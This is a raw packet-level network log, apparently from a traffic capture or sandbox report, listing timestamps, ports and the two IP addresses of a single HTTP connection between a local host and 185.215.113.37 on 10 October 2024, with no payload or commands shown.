Oct 10, 2024 18:23:19.823945045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.823945045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.823945045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824084997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824110985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824126005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824168921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824168921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824181080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824239016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824249983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824259996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824311972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824322939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824341059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824352980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824369907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824373960 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824373960 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824414015 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824414015 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824414968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824429035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824446917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824464083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824464083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824527025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824537992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824558020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824559927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824559927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824568033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824585915 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824599981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824610949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824610949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824615955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824635983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824656010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824659109 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824659109 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824668884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824687004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824696064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824709892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824709892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824718952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824729919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824748993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824753046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824753046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824763060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824789047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824789047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824882984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824893951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824912071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824914932 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824914932 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824932098 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824942112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824948072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824969053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.824980974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824980974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.824985027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825001001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825033903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825033903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825098038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825110912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825128078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825141907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825160980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825167894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825169086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825174093 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825215101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825215101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825232029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825242043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825263977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825283051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825298071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825311899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825318098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825318098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825479984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825651884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825664997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825680971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825684071 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825684071 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825695992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825711012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825726032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825726986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825727940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825738907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825753927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825768948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825768948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825768948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825783014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825798988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825813055 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825813055 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825817108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825861931 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825861931 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.825968027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825978994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.825998068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.826010942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.826028109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.826040030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.826054096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.826054096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.826056957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.826070070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.826088905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.826095104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.826095104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.827430010 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865092039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865123034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865135908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865158081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865173101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865186930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865204096 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865219116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865232944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865232944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865287066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865319967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865333080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865375996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865375996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865413904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865427971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865444899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865453959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865478039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865478039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865629911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865659952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865664005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865664005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.865674019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.865993023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.866005898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.866031885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.866045952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.866061926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.866069078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.866069078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.866108894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.866108894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.907455921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.907507896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.907522917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.907546043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.907558918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.907571077 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.907577038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.907591105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.907608032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.907653093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.907653093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.908039093 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.908060074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.908073902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.908090115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.908103943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.908109903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.908109903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.908118010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.908154964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.908154964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914515018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914549112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914562941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914587021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914603949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914618015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914623022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914623022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914638996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914679050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914699078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914699078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914736032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914747000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914796114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914796114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914797068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914814949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914870024 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914916039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914940119 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914958000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914968014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.914978027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.914978027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915008068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915080070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915122032 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915153980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915164948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915203094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915214062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915232897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915237904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915237904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915270090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915270090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915422916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915433884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915453911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915466070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915482998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915497065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915504932 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915504932 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915543079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915543079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915570021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915580034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915597916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915616989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915616989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915688038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915699005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915718079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915719032 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915719032 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915731907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915750980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915750980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915887117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915898085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915915012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915927887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915934086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915934086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915951014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915963888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915980101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915980101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.915982008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.915998936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916018963 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916018963 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916166067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916177034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916208982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916213036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916213036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916220903 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916239023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916260958 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916260958 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916292906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916304111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916326046 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916342020 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916342020 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916419029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916429043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916452885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916462898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916481018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916486025 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916486025 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916501999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916515112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916532040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916536093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916536093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916546106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916560888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916596889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916596889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.916960955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916971922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.916990042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917002916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917009115 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917021036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917033911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917049885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917057037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917057037 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917063951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917079926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917092085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917104006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917104006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917109013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917124033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917139053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917150974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917166948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917169094 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917169094 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917208910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917208910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.917327881 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917339087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917357922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.917366982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.920773029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.955940962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956002951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956017017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956029892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956043959 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956052065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956073046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956099987 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956146955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956162930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956178904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956192017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956206083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956206083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956209898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956224918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.956228018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956275940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956275940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.956368923 CEST	80	49731	185.215.113.37	192.168.2.4
